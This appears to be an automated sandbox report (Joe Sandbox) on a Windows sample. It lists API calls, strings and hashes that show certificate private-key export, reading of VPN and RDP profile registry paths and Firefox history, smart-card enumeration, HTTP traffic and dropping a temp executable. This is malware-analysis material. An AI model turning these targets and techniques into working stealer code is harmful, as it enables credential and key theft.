                                                                        • Instruction Fuzzy Hash: 85514032B1A642DAEB10EFB1E4447ED23A1AB5A788F414076DE0ED7B59DF39D14AC340

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Cert$NameStore$CertificatesCloseEnumOpenString
                                                                        • String ID: *sms$gszs$zszs
                                                                        • API String ID: 3617724111-4219868587
                                                                        • Opcode ID: d66ca8c82972cbb673cdd97f67e769fe0ece54cfa220f4f66185c4291d8d1851
                                                                        • Instruction ID: afcb71dd1094ca3778b14fa2039046ae12090be7a664c9e773f0e86dd7fa3fff
                                                                        • Opcode Fuzzy Hash: d66ca8c82972cbb673cdd97f67e769fe0ece54cfa220f4f66185c4291d8d1851
                                                                        • Instruction Fuzzy Hash: ED218676A19682C2E750DF15F4502AE6761FB86B80F449072EE8E87759DE3CD406CB40

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: CertEnumStoreSystem
                                                                        • String ID: ":{$"_":""
                                                                        • API String ID: 4132996702-2026347918
                                                                        • Opcode ID: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
                                                                        • Instruction ID: 1bc0b2bbf00023ae7ca89a98fef9443ed01ea03311a047521e7e751df7ec25fa
                                                                        • Opcode Fuzzy Hash: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
                                                                        • Instruction Fuzzy Hash: 32016221E1A642D2FA04EB56F4400B95365AF8ABC0F4890B3ED5F8777A8F3CD5438700

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: CertEnumLocationStoreSystem
                                                                        • String ID: "_": ""
                                                                        • API String ID: 863500693-1453221996
                                                                        • Opcode ID: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                        • Instruction ID: d3ae2f21d16b7cd10181ef0a5c985a2bf6c99886a13bcf8e67f2fe280e81b221
                                                                        • Opcode Fuzzy Hash: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                        • Instruction Fuzzy Hash: A0E06D95FAA503D2EE44AF62F8110F413249F4A7C0F4820B3E81F8A366DD2CD48B8300

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: FileNamedPeekPipeRead
                                                                        • String ID:
                                                                        • API String ID: 327342812-0
                                                                        • Opcode ID: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
                                                                        • Instruction ID: 69a0f25843392c9d0b3154c8cd0065bb2aa97fd8ade42007aa112a27b103edde
                                                                        • Opcode Fuzzy Hash: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
                                                                        • Instruction Fuzzy Hash: B601DE32729282C7F7108F12E40077AB3A0EB86BD4F148136EA49CBB65DFBDD4428B00

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
                                                                        • String ID:
                                                                        • API String ID: 2021502500-0
                                                                        • Opcode ID: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
                                                                        • Instruction ID: e2a1f6645c88cdad14768df0e21de86675673898184fb3d6511bebbbc5dcc201
                                                                        • Opcode Fuzzy Hash: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
                                                                        • Instruction Fuzzy Hash: 35012932A0A642C7FF509F21D49137923A1EF85B88F1495B2CA1DC6599DF7EDC86C300

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41951,?,?,00000000,00007FF6AAB419BA), ref: 00007FF6AAB42669
                                                                        • RtlReAllocateHeap.NTDLL(?,?,?,00007FF6AAB41951,?,?,00000000,00007FF6AAB419BA), ref: 00007FF6AAB4267A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                        • Instruction ID: a0f2d5159b3531d5e4eceed47e93910c3d4b1e680e7821948ea117de9d79fa20
                                                                        • Opcode Fuzzy Hash: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                        • Instruction Fuzzy Hash: 30E08619E0B583C2FD0897A3B9500755121AF5AFC0F08C0B1DE0F47755CD3CD4425A00

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 685 7ff6aab41a70-7ff6aab41ab8 call 7ff6aab41918 wvsprintfW
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: wvsprintf
                                                                        • String ID:
                                                                        • API String ID: 2795597889-0
                                                                        • Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                        • Instruction ID: aaa00bdbfce641e3a3d0354ed5493a1ef54556e30ed12d6d2e461c02cbd2d53c
                                                                        • Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                        • Instruction Fuzzy Hash: A7E06DB2A41B45C3D704DF15E94009C7B75EB99FC4B548121CB4857324CF38D997C750

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 688 7ff6aab479c4-7ff6aab479d9 GetNativeSystemInfo 689 7ff6aab479e7 688->689 690 7ff6aab479db-7ff6aab479e1 688->690 692 7ff6aab479e9-7ff6aab479ed 689->692 690->689 691 7ff6aab479e3-7ff6aab479e5 690->691 691->692
                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF6AAB474DE), ref: 00007FF6AAB479CD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: InfoNativeSystem
                                                                        • String ID:
                                                                        • API String ID: 1721193555-0
                                                                        • Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                        • Instruction ID: c99cfdc68faf48f5b7d95a4ef62d000c1907f2871d59fcab804235a072dc3e43
                                                                        • Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                        • Instruction Fuzzy Hash: E4D09E12D09582F7DA726B00E4060766265BB66709F8002B7D18E825E4AF6D96CBDA05
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
                                                                        • String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
                                                                        • API String ID: 2508640211-1951492331
                                                                        • Opcode ID: c8e59e0e6645e7aa193005796908219e94901169550dd3d48bb30a52a35410d0
                                                                        • Instruction ID: 74836ae451f205ebf3ba369cf328034f33ebacf292eba84ce5fd868b2bf93754
                                                                        • Opcode Fuzzy Hash: c8e59e0e6645e7aa193005796908219e94901169550dd3d48bb30a52a35410d0
                                                                        • Instruction Fuzzy Hash: 31127261B1A642D6EA10EB65E8512FD6361BF87B84F804173EA1E877AADF3CD507C700
                                                                        APIs
                                                                        • CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB4325E
                                                                        • CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6AAB4328D
                                                                        • CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB432BB
                                                                          • Part of subcall function 00007FF6AAB436F0: CryptExportKey.ADVAPI32 ref: 00007FF6AAB43744
                                                                          • Part of subcall function 00007FF6AAB436F0: CryptExportKey.ADVAPI32 ref: 00007FF6AAB4379E
                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43336
                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43380
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB433AC
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB433DC
                                                                        • CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB43404
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB4341C
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB4343F
                                                                        • CryptAcquireContextA.ADVAPI32 ref: 00007FF6AAB43459
                                                                        • CryptImportKey.ADVAPI32 ref: 00007FF6AAB4347E
                                                                        • OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB434B5
                                                                        • OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43505
                                                                        • QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43523
                                                                        • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43532
                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB4355D
                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB4357C
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB4359F
                                                                        • NCryptExportKey.NCRYPT ref: 00007FF6AAB43605
                                                                        • CertOpenStore.CRYPT32 ref: 00007FF6AAB43667
                                                                        • CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF6AAB43682
                                                                        • CertSetCertificateContextProperty.CRYPT32 ref: 00007FF6AAB4369E
                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF6AAB436BD
                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF6AAB436DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                        • String ID: ,-1{$4(G$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$jlzm
                                                                        • API String ID: 2161712720-3700434115
                                                                        • Opcode ID: 1259beb20cac467e91f1b8e95cda7ef049d8c99ca71799bfb8c9a1caf3a4ca4f
                                                                        • Instruction ID: faa33bef7225eafc2b5cbf98d73cd98fc521e5bf1ac053dd628534faab0246e0
                                                                        • Opcode Fuzzy Hash: 1259beb20cac467e91f1b8e95cda7ef049d8c99ca71799bfb8c9a1caf3a4ca4f
                                                                        • Instruction Fuzzy Hash: 39E16932B16A828AE710DFA1E844BEE77A1FB49788F444176DE4E57A58DF3CD10AC740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
                                                                        • String ID: =r:r$>r!r$>r!r
                                                                        • API String ID: 199669925-1865137870
                                                                        • Opcode ID: 9c78ff6a37899225c7b2c52fd49503bd2650756f8c1abc7b340087289b9d972c
                                                                        • Instruction ID: dd894acb1a6713f82b6e0464b9ab1b31127902b13ac757abf37bca9468071e9d
                                                                        • Opcode Fuzzy Hash: 9c78ff6a37899225c7b2c52fd49503bd2650756f8c1abc7b340087289b9d972c
                                                                        • Instruction Fuzzy Hash: 95A1C276A1A382C7EB10DF66A4541AD77A1FB8AB84F544076EE4E83B59DF3CD406CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
                                                                        • String ID: *.default-release$APPDATA$\places.sqlite
                                                                        • API String ID: 4154822446-3438982840
                                                                        • Opcode ID: d1dd5c64499e9df49c2477c4a4298586ea46fd7df7aaf8f63ab7981e90ccc26b
                                                                        • Instruction ID: 78de67ad72cbbcac455fe86cfd904b55ac971ef33cedf8054819b8ca91b75fe6
                                                                        • Opcode Fuzzy Hash: d1dd5c64499e9df49c2477c4a4298586ea46fd7df7aaf8f63ab7981e90ccc26b
                                                                        • Instruction Fuzzy Hash: 18316D32A19A47D2EF10DF24E8405E96331FB45794F8051B3EA5F87AA9EF6CD60AC740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Card$CardsFreeListMemory$ChangeStatus
                                                                        • String ID: "_": ""$%02X
                                                                        • API String ID: 2879528921-1880646522
                                                                        • Opcode ID: 896a816154fa73125e525209f78e47b2702fc4012d1189665c8c15a996302554
                                                                        • Instruction ID: 6deab46183013b6777b1e9c545b4435fc657a78426df204dc41c120dbcfb0b4d
                                                                        • Opcode Fuzzy Hash: 896a816154fa73125e525209f78e47b2702fc4012d1189665c8c15a996302554
                                                                        • Instruction Fuzzy Hash: F5D12A62F5A603D6EA14EF62A8511F92365AF477C4B4460B3ED1F877AADE3CE5078300
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: CryptExport$HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 532797600-0
                                                                        • Opcode ID: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                        • Instruction ID: 57edb0a47414cef4b7e192b4383022aaa642b82134aef746ad69255749fe43f0
                                                                        • Opcode Fuzzy Hash: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                        • Instruction Fuzzy Hash: 1D21A336A1A642D3EB50DF11F45076A73E0EB85B94F048171DA9E87795DF3CD4028B00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
                                                                        • String ID:
                                                                        • API String ID: 2161876737-0
                                                                        • Opcode ID: ac1ad351885b8ce302dfd172892ec62b602294288ce73c3ce92358ed0e66034f
                                                                        • Instruction ID: 1b90106d038cba55ae202b462bafcea0b13a91130591b488c15d594f1a2039e7
                                                                        • Opcode Fuzzy Hash: ac1ad351885b8ce302dfd172892ec62b602294288ce73c3ce92358ed0e66034f
                                                                        • Instruction Fuzzy Hash: 6331B621A0A643C6E764DB22F8157396291FF8ABD0F084276DD5F87BA5DF3CD4468700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
                                                                        • String ID: %08X.exe$open
                                                                        • API String ID: 2307396689-1771423410
                                                                        • Opcode ID: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
                                                                        • Instruction ID: 4e2b9b948b9b6a7adbbcfb841902c678425cdc4ce76e42a6f59aa22b84e39716
                                                                        • Opcode Fuzzy Hash: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
                                                                        • Instruction Fuzzy Hash: E5318872A19A86D6E720DF60F8847F96321FB89789F404176DA4E46958CF7CC64EC700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
